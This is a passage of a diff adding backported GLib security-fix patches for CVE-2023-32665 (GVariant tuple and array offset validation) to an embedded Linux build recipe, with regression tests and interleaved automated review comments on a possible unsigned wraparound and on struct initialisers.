++ * responsible for checking the returned values and handling invalid ones
++ * appropriately. */
+ static void
+ gvs_tuple_get_member_bounds (GVariantSerialised value,
+ gsize index_,
+@@ -1028,6 +1032,42 @@ gvs_tuple_get_child (GVariantSerialised value,
+ return child;
+ }
+
++ /* If the requested @index_ is beyond the set of indices whose framing offsets
++ * have been checked, check the remaining offsets to see whether they’re
++ * normal (in order, no overlapping tuple elements).
++ *
++ * Unlike the checks in gvs_variable_sized_array_get_child(), we have to check
++ * all the tuple *elements* here, not just all the framing offsets, since
++ * tuples contain a mix of elements which use framing offsets and ones which
++ * don’t. None of them are allowed to overlap. */
++ if (index_ > value.ordered_offsets_up_to)
++ {
++ gsize i, prev_i_end = 0;
++
++ if (value.ordered_offsets_up_to > 0)
++ gvs_tuple_get_member_bounds (value, value.ordered_offsets_up_to - 1, offset_size, NULL, &prev_i_end);
++
++ for (i = value.ordered_offsets_up_to; i <= index_; i++)
++ {
++ gsize i_start, i_end;
++
++ gvs_tuple_get_member_bounds (value, i, offset_size, &i_start, &i_end);
++
++ if (i_start > i_end || i_start < prev_i_end || i_end > value.size)
++ break;
++
++ prev_i_end = i_end;
++ }
++
++ value.ordered_offsets_up_to = i - 1;
++ }
++
++ if (index_ > value.ordered_offsets_up_to)
++ {
++ /* Offsets are invalid somewhere, so return an empty child. */
++ return child;
++ }
++
+ if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_OFFSET)
+ {
+ if (offset_size * (member_info->i + 2) > value.size)
+diff --git a/glib/gvariant-serialiser.h b/glib/gvariant-serialiser.h
+index 99d18ef..144aec8 100644
+--- a/glib/gvariant-serialiser.h
++++ b/glib/gvariant-serialiser.h
+@@ -34,8 +34,11 @@ typedef struct
+ * This guarantees that the bytes of element n don't overlap with any previous
+ * element.
+ *
+- * This is both read and set by g_variant_serialised_get_child for arrays of
+- * non-fixed-width types */
++ * This is both read and set by g_variant_serialised_get_child() for arrays of
++ * non-fixed-width types, and for tuples.
++ *
++ * Even when dealing with tuples, @ordered_offsets_up_to is an element index,
++ * rather than an index into the frame offsets. */
+ gsize ordered_offsets_up_to;
+ } GVariantSerialised;
+
+diff --git a/glib/gvariant.c b/glib/gvariant.c
+index d6f68a9..cdb428e 100644
+--- a/glib/gvariant.c
++++ b/glib/gvariant.c
+@@ -5945,6 +5945,7 @@ g_variant_byteswap (GVariant *value)
+ serialised.type_info = g_variant_get_type_info (trusted);
+ serialised.size = g_variant_get_size (trusted);
+ serialised.data = g_malloc (serialised.size);
++ serialised.ordered_offsets_up_to = G_MAXSIZE; /* operating on the normal form */
+ g_variant_store (trusted, serialised.data);
+ g_variant_unref (trusted);
+
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index 967e9a1..a84b02e 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -1,6 +1,7 @@
+ /*
+ * Copyright © 2010 Codethink Limited
+ * Copyright © 2020 William Manley
++ * Copyright © 2022 Endless OS Foundation, LLC
+ *
+ * This library is free software; you can redistribute it and/or
+ * modify it under the terms of the GNU Lesser General Public
+@@ -1451,6 +1452,7 @@ test_maybe (void)
+ serialised.data = flavoured_malloc (needed_size, flavour);
+ serialised.size = needed_size;
+ serialised.depth = 0;
++ serialised.ordered_offsets_up_to = 0;
+
+ g_variant_serialiser_serialise (serialised,
+ random_instance_filler,
+@@ -1574,6 +1576,7 @@ test_array (void)
+ serialised.data = flavoured_malloc (needed_size, flavour);
+ serialised.size = needed_size;
+ serialised.depth = 0;
++ serialised.ordered_offsets_up_to = 0;
+
+ g_variant_serialiser_serialise (serialised, random_instance_filler,
+ (gpointer *) instances, n_children);
+@@ -1738,6 +1741,7 @@ test_tuple (void)
+ serialised.data = flavoured_malloc (needed_size, flavour);
+ serialised.size = needed_size;
+ serialised.depth = 0;
++ serialised.ordered_offsets_up_to = 0;
+
+ g_variant_serialiser_serialise (serialised, random_instance_filler,
+ (gpointer *) instances, n_children);
+@@ -1834,6 +1838,7 @@ test_variant (void)
+ serialised.data = flavoured_malloc (needed_size, flavour);
+ serialised.size = needed_size;
+ serialised.depth = 0;
++ serialised.ordered_offsets_up_to = 0;
+
+ g_variant_serialiser_serialise (serialised, random_instance_filler,
+ (gpointer *) &instance, 1);
+@@ -5106,6 +5111,176 @@ test_normal_checking_tuple_offsets (void)
+ g_variant_unref (variant);
+ }
+
++/* This is a regression test that we can't have non-normal values that take up
++ * significantly more space than the normal equivalent, by specifying the
++ * offset table entries so that tuple elements overlap.
++ *
++ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2121#note_838503 and
++ * https://gitlab.gnome.org/GNOME/glib/-/issues/2121#note_838513 */
++static void
++test_normal_checking_tuple_offsets2 (void)
++{
++ const GVariantType *data_type = G_VARIANT_TYPE ("(yyaiyyaiyy)");
++ const guint8 data[] = {
++ 0x12, 0x34, 0x56, 0x78, 0x01,
++ /*
++ ^───────────────────┘
++
++ ^^^^^^^^^^ 1st yy
++ ^^^^^^^^^^ 2nd yy
++ ^^^^^^^^^^ 3rd yy
++ ^^^^ Framing offsets
++ */
++
++ /* If this variant was encoded normally, it would be something like this:
++ * 0x12, 0x34, pad, pad, [array bytes], 0x56, 0x78, pad, pad, [array bytes], 0x9A, 0xBC, 0xXX
++ * ^─────────────────────────────────────────────────────┘
++ *
++ * ^^^^^^^^^^ 1st yy
++ * ^^^^^^^^^^ 2nd yy
++ * ^^^^^^^^^^ 3rd yy
++ * ^^^^ Framing offsets
++ */
++ };
++ gsize size = sizeof (data);
++ GVariant *variant = NULL;
++ GVariant *normal_variant = NULL;
++ GVariant *expected = NULL;
++
++ variant = g_variant_new_from_data (data_type, data, size, FALSE, NULL, NULL);
++ g_assert_nonnull (variant);
++
++ normal_variant = g_variant_get_normal_form (variant);
++ g_assert_nonnull (normal_variant);
++ g_assert_cmpuint (g_variant_get_size (normal_variant), <=, size * 3);
++
++ expected = g_variant_new_parsed (
++ "@(yyaiyyaiyy) (0x12, 0x34, [], 0x00, 0x00, [], 0x00, 0x00)");
++ g_assert_cmpvariant (expected, variant);
++ g_assert_cmpvariant (expected, normal_variant);
++
++ g_variant_unref (expected);
++ g_variant_unref (normal_variant);
++ g_variant_unref (variant);
++}
++
++/* This is a regression test that overlapping entries in the offset table are
++ * decoded consistently, even though they’re non-normal.
++ *
++ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2121#note_910935 */
++static void
++test_normal_checking_tuple_offsets3 (void)
++{
++ /* The expected decoding of this non-normal byte stream is complex. See
++ * section 2.7.3 (Handling Non-Normal Serialised Data) of the GVariant
++ * specification.
++ *
++ * The rule “Child Values Overlapping Framing Offsets†from the specification
++ * says that the first `ay` must be decoded as `[0x01]` even though it
++ * overlaps the first byte of the offset table. However, since commit
++ * 7eedcd76f7d5b8c98fa60013e1fe6e960bf19df3, GLib explicitly doesn’t allow
++ * this as it’s exploitable. So the first `ay` must be given a default value.
++ *
++ * The second and third `ay`s must be given default values because of rule
++ * “End Boundary Precedes Start Boundaryâ€.
++ *
++ * The `i` must be given a default value because of rule “Start or End
++ * Boundary of a Child Falls Outside the Containerâ€.
++ */
++ const GVariantType *data_type = G_VARIANT_TYPE ("(ayayiay)");
++ const guint8 data[] = {
++ 0x01, 0x00, 0x02,
++ /*
++ ^──┘
++
++ ^^^^^^^^^^ 1st ay, bytes 0-2 (but given a default value anyway, see above)
++ 2nd ay, bytes 2-0
++ i, bytes 0-4
++ 3rd ay, bytes 4-1
++ ^^^^^^^^^^ Framing offsets
++ */
++ };
++ gsize size = sizeof (data);
++ GVariant *variant = NULL;
++ GVariant *normal_variant = NULL;
++ GVariant *expected = NULL;
++
++ variant = g_variant_new_from_data (data_type, data, size, FALSE, NULL, NULL);
++ g_assert_nonnull (variant);
++
++ g_assert_false (g_variant_is_normal_form (variant));
++
++ normal_variant = g_variant_get_normal_form (variant);
++ g_assert_nonnull (normal_variant);
++ g_assert_cmpuint (g_variant_get_size (normal_variant), <=, size * 3);
++
++ expected = g_variant_new_parsed ("@(ayayiay) ([], [], 0, [])");
++ g_assert_cmpvariant (expected, variant);
++ g_assert_cmpvariant (expected, normal_variant);
++
++ g_variant_unref (expected);
++ g_variant_unref (normal_variant);
++ g_variant_unref (variant);
++}
++
++/* This is a regression test that overlapping entries in the offset table are
++ * decoded consistently, even though they’re non-normal.
++ *
++ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2121#note_910935 */
++static void
++test_normal_checking_tuple_offsets4 (void)
++{
++ /* The expected decoding of this non-normal byte stream is complex. See
++ * section 2.7.3 (Handling Non-Normal Serialised Data) of the GVariant
++ * specification.
++ *
++ * The rule “Child Values Overlapping Framing Offsets†from the specification
++ * says that the first `ay` must be decoded as `[0x01]` even though it
++ * overlaps the first byte of the offset table. However, since commit
++ * 7eedcd76f7d5b8c98fa60013e1fe6e960bf19df3, GLib explicitly doesn’t allow
++ * this as it’s exploitable. So the first `ay` must be given a default value.
++ *
++ * The second `ay` must be given a default value because of rule “End Boundary
++ * Precedes Start Boundaryâ€.
++ *
++ * The third `ay` must be given a default value because its framing offsets
++ * overlap that of the first `ay`.
++ */
++ const GVariantType *data_type = G_VARIANT_TYPE ("(ayayay)");
++ const guint8 data[] = {
++ 0x01, 0x00, 0x02,
++ /*
++ ^──┘
++
++ ^^^^^^^^^^ 1st ay, bytes 0-2 (but given a default value anyway, see above)
++ 2nd ay, bytes 2-0
++ 3rd ay, bytes 0-1
++ ^^^^^^^^^^ Framing offsets
++ */
++ };
++ gsize size = sizeof (data);
++ GVariant *variant = NULL;
++ GVariant *normal_variant = NULL;
++ GVariant *expected = NULL;
++
++ variant = g_variant_new_from_data (data_type, data, size, FALSE, NULL, NULL);
++ g_assert_nonnull (variant);
++
++ g_assert_false (g_variant_is_normal_form (variant));
++
++ normal_variant = g_variant_get_normal_form (variant);
++ g_assert_nonnull (normal_variant);
++ g_assert_cmpuint (g_variant_get_size (normal_variant), <=, size * 3);
++
++ expected = g_variant_new_parsed ("@(ayayay) ([], [], [])");
++ g_assert_cmpvariant (expected, variant);
++ g_assert_cmpvariant (expected, normal_variant);
++
++ g_variant_unref (expected);
++ g_variant_unref (normal_variant);
++ g_variant_unref (variant);
++}
++
+ /* Test that an empty object path is normalised successfully to the base object
+ * path, ‘/’. */
+ static void
+@@ -5253,6 +5428,12 @@ main (int argc, char **argv)
+ test_normal_checking_array_offsets2);
+ g_test_add_func ("/gvariant/normal-checking/tuple-offsets",
+ test_normal_checking_tuple_offsets);
++ g_test_add_func ("/gvariant/normal-checking/tuple-offsets2",
++ test_normal_checking_tuple_offsets2);
++ g_test_add_func ("/gvariant/normal-checking/tuple-offsets3",
++ test_normal_checking_tuple_offsets3);
++ g_test_add_func ("/gvariant/normal-checking/tuple-offsets4",
++ test_normal_checking_tuple_offsets4);
+ g_test_add_func ("/gvariant/normal-checking/empty-object-path",
+ test_normal_checking_empty_object_path);
+
+--
+2.24.4
+
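Review bot: In the offset-checking loop this patch adds to gvs_tuple_get_child (glib/gvariant-serialiser.c section), `value.ordered_offsets_up_to = i - 1;` wraps to G_MAXSIZE if the loop breaks on its first iteration with `i == 0`, because `i` is an unsigned gsize. The `index_ > value.ordered_offsets_up_to` test that follows would then stop returning the empty child for a tuple whose first element already fails the bounds test. Whether element 0 can fail depends on gvs_tuple_get_member_bounds, whose body is outside this hunk, so this should be confirmed against the target tree and against any upstream follow-up before diverging from the backport; a guard such as `value.ordered_offsets_up_to = (i > 0) ? i - 1 : 0;` would keep the field from wrapping. The same assignment is carried as context into CVE-2023-32665-0008.patch, where it is followed by `value.checked_offsets_up_to = index_;` and would leave ordered greater than checked, the state that patch's new test in g_variant_serialised_check rejects.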
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0007.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0007.patch
new file mode 100644
index 0000000000..83d0205160
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0007.patch
@@ -0,0 +1,49 @@
+From e6490c84e84ba9f182fbd83b51ff4f9f5a0a1793 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 16 Aug 2023 03:42:47 +0000
+Subject: [PATCH] gvariant: Port g_variant_deep_copy() to count its iterations
+ directly
+
+This is equivalent to what `GVariantIter` does, but it means that
+`g_variant_deep_copy()` is making its own `g_variant_get_child_value()`
+calls.
+
+This will be useful in an upcoming commit, where those child values will
+be inspected a little more deeply.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/e6490c84e84ba9f182fbd83b51ff4f9f5a0a1793]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant.c | 7 +++----
+ 1 file changed, 3 insertions(+), 4 deletions(-)
+
+diff --git a/glib/gvariant.c b/glib/gvariant.c
+index cdb428e..fdd36be 100644
+--- a/glib/gvariant.c
++++ b/glib/gvariant.c
+@@ -5799,14 +5799,13 @@ g_variant_deep_copy (GVariant *value)
+ case G_VARIANT_CLASS_VARIANT:
+ {
+ GVariantBuilder builder;
+- GVariantIter iter;
+- GVariant *child;
++ gsize i, n_children;
+
+ g_variant_builder_init (&builder, g_variant_get_type (value));
+- g_variant_iter_init (&iter, value);
+
+- while ((child = g_variant_iter_next_value (&iter)))
++ for (i = 0, n_children = g_variant_n_children (value); i < n_children; i++)
+ {
++ GVariant *child = g_variant_get_child_value (value, i);
+ g_variant_builder_add_value (&builder, g_variant_deep_copy (child));
+ g_variant_unref (child);
+ }
+--
+2.24.4
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0008.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0008.patch
new file mode 100644
index 0000000000..f098548618
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0008.patch
@@ -0,0 +1,394 @@
+From d1a293c4e29880b8d17bb826c9a426a440ca4a91 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 17 Aug 2023 01:30:38 +0000
+Subject: [PATCH] gvariant: Track checked and ordered offsets independently
+
+The past few commits introduced the concept of known-good offsets in the
+offset table (which is used for variable-width arrays and tuples).
+Good offsets are ones which are non-overlapping with all the previous
+offsets in the table.
+
+If a bad offset is encountered when indexing into the array or tuple,
+the cached known-good offset index will not be increased. In this way,
+all child variants at and beyond the first bad offset can be returned as
+default values rather than dereferencing potentially invalid data.
+
+In this case, there was no information about the fact that the indexes
+between the highest known-good index and the requested one had been
+checked already. That could lead to a pathological case where an offset
+table with an invalid first offset is repeatedly checked in full when
+trying to access higher-indexed children.
+
+Avoid that by storing the index of the highest checked offset in the
+table, as well as the index of the highest good/ordered offset.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/d1a293c4e29880b8d17bb826c9a426a440ca4a91]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-core.c | 28 ++++++++++++++++++++++++
+ glib/gvariant-serialiser.c | 44 +++++++++++++++++++++++++++-----------
+ glib/gvariant-serialiser.h | 9 ++++++++
+ glib/gvariant.c | 1 +
+ glib/tests/gvariant.c | 5 +++++
+ 5 files changed, 75 insertions(+), 12 deletions(-)
+
+diff --git a/glib/gvariant-core.c b/glib/gvariant-core.c
+index b951cd9..1b9d5cc 100644
+--- a/glib/gvariant-core.c
++++ b/glib/gvariant-core.c
+@@ -67,6 +67,7 @@ struct _GVariant
+ GBytes *bytes;
+ gconstpointer data;
+ gsize ordered_offsets_up_to;
++ gsize checked_offsets_up_to;
+ } serialised;
+
+ struct
+@@ -182,6 +183,24 @@ struct _GVariant
+ * This field is only relevant for arrays of non
+ * fixed width types and for tuples.
+ *
++ * .checked_offsets_up_to: Similarly to .ordered_offsets_up_to, this stores
++ * the index of the highest element, n, whose frame
++ * offsets (and all the preceding frame offsets)
++ * have been checked for validity.
++ *
++ * It is always the case that
++ * .checked_offsets_up_to ≥ .ordered_offsets_up_to.
++ *
++ * If .checked_offsets_up_to == .ordered_offsets_up_to,
++ * then a bad offset has not been found so far.
++ *
++ * If .checked_offsets_up_to > .ordered_offsets_up_to,
++ * then a bad offset has been found at
++ * (.ordered_offsets_up_to + 1).
++ *
++ * This field is only relevant for arrays of non
++ * fixed width types and for tuples.
++ *
+ * .tree: Only valid when the instance is in tree form.
+ *
+ * Note that accesses from other threads could result in
+@@ -386,6 +405,7 @@ g_variant_to_serialised (GVariant *value)
+ value->size,
+ value->depth,
+ value->contents.serialised.ordered_offsets_up_to,
++ value->contents.serialised.checked_offsets_up_to,
+ };
+ return serialised;
+ }
+@@ -418,6 +438,7 @@ g_variant_serialise (GVariant *value,
+ serialised.data = data;
+ serialised.depth = value->depth;
+ serialised.ordered_offsets_up_to = 0;
++ serialised.checked_offsets_up_to = 0;
+
+ children = (gpointer *) value->contents.tree.children;
+ n_children = value->contents.tree.n_children;
+@@ -464,10 +485,12 @@ g_variant_fill_gvs (GVariantSerialised *serialised,
+ if (value->state & STATE_SERIALISED)
+ {
+ serialised->ordered_offsets_up_to = value->contents.serialised.ordered_offsets_up_to;
++ serialised->checked_offsets_up_to = value->contents.serialised.checked_offsets_up_to;
+ }
+ else
+ {
+ serialised->ordered_offsets_up_to = 0;
++ serialised->checked_offsets_up_to = 0;
+ }
+
+ if (serialised->data)
+@@ -513,6 +536,7 @@ g_variant_ensure_serialised (GVariant *value)
+ value->contents.serialised.data = g_bytes_get_data (bytes, NULL);
+ value->contents.serialised.bytes = bytes;
+ value->contents.serialised.ordered_offsets_up_to = G_MAXSIZE;
++ value->contents.serialised.checked_offsets_up_to = G_MAXSIZE;
+ value->state |= STATE_SERIALISED;
+ }
+ }
+@@ -594,6 +618,7 @@ g_variant_new_from_bytes (const GVariantType *type,
+ serialised.data = (guchar *) g_bytes_get_data (bytes, &serialised.size);
+ serialised.depth = 0;
+ serialised.ordered_offsets_up_to = trusted ? G_MAXSIZE : 0;
++ serialised.checked_offsets_up_to = trusted ? G_MAXSIZE : 0;
+
+ if (!g_variant_serialised_check (serialised))
+ {
+@@ -644,6 +669,7 @@ g_variant_new_from_bytes (const GVariantType *type,
+ }
+
+ value->contents.serialised.ordered_offsets_up_to = trusted ? G_MAXSIZE : 0;
++ value->contents.serialised.checked_offsets_up_to = trusted ? G_MAXSIZE : 0;
+
+ g_clear_pointer (&owned_bytes, g_bytes_unref);
+
+@@ -1120,6 +1146,7 @@ g_variant_get_child_value (GVariant *value,
+
+ /* Update the cached ordered_offsets_up_to, since @serialised will be thrown away when this function exits */
+ value->contents.serialised.ordered_offsets_up_to = MAX (value->contents.serialised.ordered_offsets_up_to, serialised.ordered_offsets_up_to);
++ value->contents.serialised.checked_offsets_up_to = MAX (value->contents.serialised.checked_offsets_up_to, serialised.checked_offsets_up_to);
+
+ /* Check whether this would cause nesting too deep. If so, return a fake
+ * child. The only situation we expect this to happen in is with a variant,
+@@ -1147,6 +1174,7 @@ g_variant_get_child_value (GVariant *value,
+ g_bytes_ref (value->contents.serialised.bytes);
+ child->contents.serialised.data = s_child.data;
+ child->contents.serialised.ordered_offsets_up_to = s_child.ordered_offsets_up_to;
++ child->contents.serialised.checked_offsets_up_to = s_child.checked_offsets_up_to;
+
+ return child;
+ }
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index cd4a3e6..0bf7243 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -120,6 +120,8 @@
+ *
+ * @depth has no restrictions; the depth of a top-level serialised #GVariant is
+ * zero, and it increases for each level of nested child.
++ *
++ * @checked_offsets_up_to is always ≥ @ordered_offsets_up_to
+ */
+
+ /* < private >
+@@ -147,6 +149,9 @@ g_variant_serialised_check (GVariantSerialised serialised)
+ !(serialised.size == 0 || serialised.data != NULL))
+ return FALSE;
+
++ if (serialised.ordered_offsets_up_to > serialised.checked_offsets_up_to)
++ return FALSE;
++
+ /* Depending on the native alignment requirements of the machine, the
+ * compiler will insert either 3 or 7 padding bytes after the char.
+ * This will result in the sizeof() the struct being 12 or 16.
+@@ -266,6 +271,7 @@ gvs_fixed_sized_maybe_get_child (GVariantSerialised value,
+ g_variant_type_info_ref (value.type_info);
+ value.depth++;
+ value.ordered_offsets_up_to = 0;
++ value.checked_offsets_up_to = 0;
+
+ return value;
+ }
+@@ -297,7 +303,7 @@ gvs_fixed_sized_maybe_serialise (GVariantSerialised value,
+ {
+ if (n_children)
+ {
+- GVariantSerialised child = { NULL, value.data, value.size, value.depth + 1, 0 };
++ GVariantSerialised child = { NULL, value.data, value.size, value.depth + 1, 0, 0 };
+
+ gvs_filler (&child, children[0]);
+ }
+@@ -320,6 +326,7 @@ gvs_fixed_sized_maybe_is_normal (GVariantSerialised value)
+ value.type_info = g_variant_type_info_element (value.type_info);
+ value.depth++;
+ value.ordered_offsets_up_to = 0;
++ value.checked_offsets_up_to = 0;
+
+ return g_variant_serialised_is_normal (value);
+ }
+@@ -362,6 +369,7 @@ gvs_variable_sized_maybe_get_child (GVariantSerialised value,
+
+ value.depth++;
+ value.ordered_offsets_up_to = 0;
++ value.checked_offsets_up_to = 0;
+
+ return value;
+ }
+@@ -392,7 +400,7 @@ gvs_variable_sized_maybe_serialise (GVariantSerialised value,
+ {
+ if (n_children)
+ {
+- GVariantSerialised child = { NULL, value.data, value.size - 1, value.depth + 1, 0 };
++ GVariantSerialised child = { NULL, value.data, value.size - 1, value.depth + 1, 0, 0 };
+
+ /* write the data for the child. */
+ gvs_filler (&child, children[0]);
+@@ -413,6 +421,7 @@ gvs_variable_sized_maybe_is_normal (GVariantSerialised value)
+ value.size--;
+ value.depth++;
+ value.ordered_offsets_up_to = 0;
++ value.checked_offsets_up_to = 0;
+
+ return g_variant_serialised_is_normal (value);
+ }
+@@ -739,39 +748,46 @@ gvs_variable_sized_array_get_child (GVariantSerialised value,
+
+ /* If the requested @index_ is beyond the set of indices whose framing offsets
+ * have been checked, check the remaining offsets to see whether they’re
+- * normal (in order, no overlapping array elements). */
+- if (index_ > value.ordered_offsets_up_to)
++ * normal (in order, no overlapping array elements).
++ *
++ * Don’t bother checking if the highest known-good offset is lower than the
++ * highest checked offset, as that means there’s an invalid element at that
++ * index, so there’s no need to check further. */
++ if (index_ > value.checked_offsets_up_to &&
++ value.ordered_offsets_up_to == value.checked_offsets_up_to)
+ {
+ switch (offsets.offset_size)
+ {
+ case 1:
+ {
+ value.ordered_offsets_up_to = find_unordered_guint8 (
+- offsets.array, value.ordered_offsets_up_to, index_ + 1);
++ offsets.array, value.checked_offsets_up_to, index_ + 1);
+ break;
+ }
+ case 2:
+ {
+ value.ordered_offsets_up_to = find_unordered_guint16 (
+- offsets.array, value.ordered_offsets_up_to, index_ + 1);
++ offsets.array, value.checked_offsets_up_to, index_ + 1);
+ break;
+ }
+ case 4:
+ {
+ value.ordered_offsets_up_to = find_unordered_guint32 (
+- offsets.array, value.ordered_offsets_up_to, index_ + 1);
++ offsets.array, value.checked_offsets_up_to, index_ + 1);
+ break;
+ }
+ case 8:
+ {
+ value.ordered_offsets_up_to = find_unordered_guint64 (
+- offsets.array, value.ordered_offsets_up_to, index_ + 1);
++ offsets.array, value.checked_offsets_up_to, index_ + 1);
+ break;
+ }
+ default:
+ /* gvs_get_offset_size() only returns maximum 8 */
+ g_assert_not_reached ();
+ }
++
++ value.checked_offsets_up_to = index_;
+ }
+
+ if (index_ > value.ordered_offsets_up_to)
+@@ -916,6 +932,7 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
+
+ /* All offsets have now been checked. */
+ value.ordered_offsets_up_to = G_MAXSIZE;
++ value.checked_offsets_up_to = G_MAXSIZE;
+
+ return TRUE;
+ }
+@@ -1040,14 +1057,15 @@ gvs_tuple_get_child (GVariantSerialised value,
+ * all the tuple *elements* here, not just all the framing offsets, since
+ * tuples contain a mix of elements which use framing offsets and ones which
+ * don’t. None of them are allowed to overlap. */
+- if (index_ > value.ordered_offsets_up_to)
++ if (index_ > value.checked_offsets_up_to &&
++ value.ordered_offsets_up_to == value.checked_offsets_up_to)
+ {
+ gsize i, prev_i_end = 0;
+
+- if (value.ordered_offsets_up_to > 0)
+- gvs_tuple_get_member_bounds (value, value.ordered_offsets_up_to - 1, offset_size, NULL, &prev_i_end);
++ if (value.checked_offsets_up_to > 0)
++ gvs_tuple_get_member_bounds (value, value.checked_offsets_up_to - 1, offset_size, NULL, &prev_i_end);
+
+- for (i = value.ordered_offsets_up_to; i <= index_; i++)
++ for (i = value.checked_offsets_up_to; i <= index_; i++)
+ {
+ gsize i_start, i_end;
+
+@@ -1060,6 +1078,7 @@ gvs_tuple_get_child (GVariantSerialised value,
+ }
+
+ value.ordered_offsets_up_to = i - 1;
++ value.checked_offsets_up_to = index_;
+ }
+
+ if (index_ > value.ordered_offsets_up_to)
+@@ -1257,6 +1276,7 @@ gvs_tuple_is_normal (GVariantSerialised value)
+
+ /* All element bounds have been checked above. */
+ value.ordered_offsets_up_to = G_MAXSIZE;
++ value.checked_offsets_up_to = G_MAXSIZE;
+
+ {
+ gsize fixed_size;
+diff --git a/glib/gvariant-serialiser.h b/glib/gvariant-serialiser.h
+index 144aec8..e132451 100644
+--- a/glib/gvariant-serialiser.h
++++ b/glib/gvariant-serialiser.h
+@@ -40,6 +40,15 @@ typedef struct
+ * Even when dealing with tuples, @ordered_offsets_up_to is an element index,
+ * rather than an index into the frame offsets. */
+ gsize ordered_offsets_up_to;
++
++ /* Similar to @ordered_offsets_up_to. This gives the index of the child element
++ * whose frame offset is the highest in the offset table which has been
++ * checked so far.
++ *
++ * This is always ≥ @ordered_offsets_up_to. It is always an element index.
++ *
++ * See documentation in gvariant-core.c for `struct GVariant` for details. */
++ gsize checked_offsets_up_to;
+ } GVariantSerialised;
+
+ /* deserialisation */
+diff --git a/glib/gvariant.c b/glib/gvariant.c
+index fdd36be..f910bd4 100644
+--- a/glib/gvariant.c
++++ b/glib/gvariant.c
+@@ -5945,6 +5945,7 @@ g_variant_byteswap (GVariant *value)
+ serialised.size = g_variant_get_size (trusted);
+ serialised.data = g_malloc (serialised.size);
+ serialised.ordered_offsets_up_to = G_MAXSIZE; /* operating on the normal form */
++ serialised.checked_offsets_up_to = G_MAXSIZE;
+ g_variant_store (trusted, serialised.data);
+ g_variant_unref (trusted);
+
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index a84b02e..640f3c0 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -1286,6 +1286,7 @@ random_instance_filler (GVariantSerialised *serialised,
+
+ serialised->depth = 0;
+ serialised->ordered_offsets_up_to = 0;
++ serialised->checked_offsets_up_to = 0;
+
+ g_assert_true (serialised->type_info == instance->type_info);
+ g_assert_cmpuint (serialised->size, ==, instance->size);
+@@ -1453,6 +1454,7 @@ test_maybe (void)
+ serialised.size = needed_size;
+ serialised.depth = 0;
+ serialised.ordered_offsets_up_to = 0;
++ serialised.checked_offsets_up_to = 0;
+
+ g_variant_serialiser_serialise (serialised,
+ random_instance_filler,
+@@ -1577,6 +1579,7 @@ test_array (void)
+ serialised.size = needed_size;
+ serialised.depth = 0;
+ serialised.ordered_offsets_up_to = 0;
++ serialised.checked_offsets_up_to = 0;
+
+ g_variant_serialiser_serialise (serialised, random_instance_filler,
+ (gpointer *) instances, n_children);
+@@ -1742,6 +1745,7 @@ test_tuple (void)
+ serialised.size = needed_size;
+ serialised.depth = 0;
+ serialised.ordered_offsets_up_to = 0;
++ serialised.checked_offsets_up_to = 0;
+
+ g_variant_serialiser_serialise (serialised, random_instance_filler,
+ (gpointer *) instances, n_children);
+@@ -1839,6 +1843,7 @@ test_variant (void)
+ serialised.size = needed_size;
+ serialised.depth = 0;
+ serialised.ordered_offsets_up_to = 0;
++ serialised.checked_offsets_up_to = 0;
+
+ g_variant_serialiser_serialise (serialised, random_instance_filler,
+ (gpointer *) &instance, 1);
+--
+2.24.4
+
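Review bot: The new `serialised.ordered_offsets_up_to > serialised.checked_offsets_up_to` rejection in g_variant_serialised_check makes every GVariantSerialised initialiser responsible for setting both fields, and the hunks here can only show the sites this patch touches. Because this is a backport, any site in the target glib version that sets `ordered_offsets_up_to = G_MAXSIZE` without the new field would start failing the check, so a search of the patched tree for `ordered_offsets_up_to` is worth doing before merging. The positional initialisers in gvs_fixed_sized_maybe_serialise and gvs_variable_sized_maybe_serialise (`{ NULL, value.data, value.size, value.depth + 1, 0, 0 }`) would be easier to audit with a trailing comment such as `/* ordered_offsets_up_to, checked_offsets_up_to */`.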
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0009.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0009.patch
new file mode 100644
index 0000000000..a523e60b91
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0009.patch
@@ -0,0 +1,97 @@
+From 298a537d5f6783e55d87e40011ee3fd3b22b72f9 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 17 Aug 2023 01:39:01 +0000
+Subject: [PATCH] gvariant: Zero-initialise various GVariantSerialised objects
+
+The following few commits will add a couple of new fields to
+`GVariantSerialised`, and they should be zero-filled by default.
+
+Try and pre-empt that a bit by zero-filling `GVariantSerialised` by
+default in a few places.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
